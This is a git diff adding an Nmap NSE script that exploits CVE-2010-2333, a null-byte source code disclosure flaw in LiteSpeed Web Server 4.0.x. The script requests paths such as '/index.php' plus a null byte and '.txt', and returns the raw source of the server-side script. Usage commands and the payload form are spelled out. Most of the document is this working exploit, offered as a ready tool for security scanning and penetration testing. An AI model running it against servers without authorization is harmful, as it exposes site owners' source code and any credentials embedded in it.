diff --git a/scripts/http-litespeed-sourcecode-download.nse b/scripts/http-litespeed-sourcecode-download.nse
new file mode 100644
index 000000000..2c7bb857d
--- /dev/null
+++ b/scripts/http-litespeed-sourcecode-download.nse
@@ -0,0 +1,66 @@
+description = [[
+http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
+
+If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
+* /index.php\00.txt
+
+References:
+* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
+* http://www.exploit-db.com/exploits/13850/
+]]
+
+---
+-- @usage
+-- nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
+-- nmap -p8088 --script http-litespeed-sourcecode-download
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 8088/tcp open radan-http syn-ack
+-- | http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
+-- |
+-- |
+-- |
+-- |
+-- |_
+--
+-- @args http-litespeed-sourcecode-download.uri URI path to remote file
+---
+
+author = "Paulino Calderon"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln", "intrusive", "exploit"}
+
+require "http"
+require "shortport"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local output = {}
+ local rfile = stdnse.get_script_args("http-litespeed-sourcecode-download.uri") or "/index.php"
+
+ stdnse.print_debug(1, "%s: Trying to download the source code of %s", SCRIPT_NAME, rfile)
+ --we append a null byte followed by ".txt" to retrieve the source code
+ local req = http.get(host, port, rfile.."\00.txt")
+
+ --If we don't get status 200, the server is not vulnerable
+ if req.status then
+ if req.status ~= 200 then
+ if req.status == 400 and nmap.verbosity() >= 2 then
+ output[#output+1] = "Request with null byte did not work. This web server might not be vulnerable"
+ elseif req.status == 404 and nmap.verbosity() >= 2 then
+ output[#output+1] = string.format("Page: %s was not found. Try with an existing file.", rfile)
+ end
+ stdnse.print_debug(2, "%s:Request status:%s body:%s", SCRIPT_NAME, req.status, req.body)
+ else
+ output[#output+1] = "\nLitespeed Web Server Source Code Disclosure (CVE-2010-2333)"
+ output[#output+1] = string.format("%s source code:", rfile)
+ output[#output+1] = req.body
+ end
+ end
+
+ if #output>0 then
+ return stdnse.strjoin("\n", output)
+ end
+end
diff --git a/scripts/script.db b/scripts/script.db
index 07203b8f1..8919d2fdc 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -79,6 +79,7 @@ Entry { filename = "http-form-brute.nse", categories = { "auth", "intrusive", }
Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } }
Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } }
+Entry { filename = "http-litespeed-sourcecode-download.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "http-majordomo2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "http-malware-host.nse", categories = { "malware", "safe", } }
Entry { filename = "http-methods.nse", categories = { "default", "safe", } }